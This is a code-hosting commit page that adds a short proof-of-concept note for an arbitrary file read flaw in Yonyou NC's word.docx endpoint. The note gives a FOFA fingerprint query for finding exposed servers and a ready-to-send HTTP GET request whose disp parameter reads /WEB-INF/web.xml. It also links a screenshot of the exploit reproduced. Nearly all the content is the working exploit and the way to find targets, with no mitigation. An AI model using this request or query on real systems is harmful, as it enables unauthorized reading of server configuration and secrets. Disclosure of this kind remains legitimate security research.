admin/POC00
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Create 用友NC word.docx任意文件读取漏洞.md

Browse Source
This commit is contained in:
wy876 2023-11-26 11:36:04 +08:00 committed by GitHub
parent 57db70681e
commit 085a6add25
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 20 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

20
用友NC word.docx任意文件读取漏洞.md Normal file
View File

@ -0,0 +1,20 @@
## 用友NC word.docx任意文件读取漏洞
## fofa
```
body="UClient.dmg"
```
## poc
```
GET /portal/docctr/open/word.docx?disp=/WEB-INF/web.xml HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept: */*
Connection: Keep-Alive
```
## 漏洞复现
![0152cd5a2d208fb2e336de5ac3621ebb](https://github.com/wy876/POC/assets/139549762/05dcd3bf-a6ae-4aac-95ca-e6788e2eadb0)